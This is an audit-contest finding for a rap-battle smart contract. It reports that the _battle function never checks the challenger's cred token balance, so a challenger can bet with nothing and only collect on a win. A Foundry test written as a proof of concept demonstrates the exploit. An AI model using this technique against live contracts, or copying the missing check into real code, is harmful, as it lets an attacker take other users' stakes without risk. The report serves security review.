H-4: Missing cred token balance check for challenger in _battle function, allowing challengers to participate with zero cred balance.
Summary
There is no logic in internal function _battle that checks whether the challenger has enough cred balance to put on bet in a rap battle, allowing challenger to participate in rap battle with zero cred tokens and also potentially win defender's bet.
Vulnerability Details
A challenger can participate in rap battle without owning any cred token. If he wins, he takes the money. if he loses, the transaction reverts due to insufficient balance.
#POC
function testChallengerCanRapBattleWithoutCred() public{
vm.startPrank(user);
oneShot.mintRapper();
oneShot.approve(address(streets), 0);
streets.stake(0);
vm.stopPrank();
vm.warp(4 days + 1);
vm.startPrank(user);
streets.unstake(0);
vm.stopPrank();
vm.startPrank(challenger);
oneShot.mintRapper();
vm.startPrank(user);
oneShot.approve(address(rapBattle), 0);
cred.approve(address(rapBattle), 3);
rapBattle.goOnStageOrBattle(0, 3);
vm.stopPrank();
console.log(cred.balanceOf(challenger));
console.log(cred.balanceOf(user));
vm.startPrank(challenger);
oneShot.approve(address(rapBattle), 1);
cred.approve(address(rapBattle), 3);
rapBattle.goOnStageOrBattle(1, 3);
vm.stopPrank();
console.log(cred.balanceOf(challenger));
console.log(cred.balanceOf(user));
}
Impact
Challenger will never loose money. if he wins, he wins all. if he loses, transaction reverts.
Tools Used
Manual review
Recommendations
Lead Judging Commences
missing check for sufficient `_credBet_` approval
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.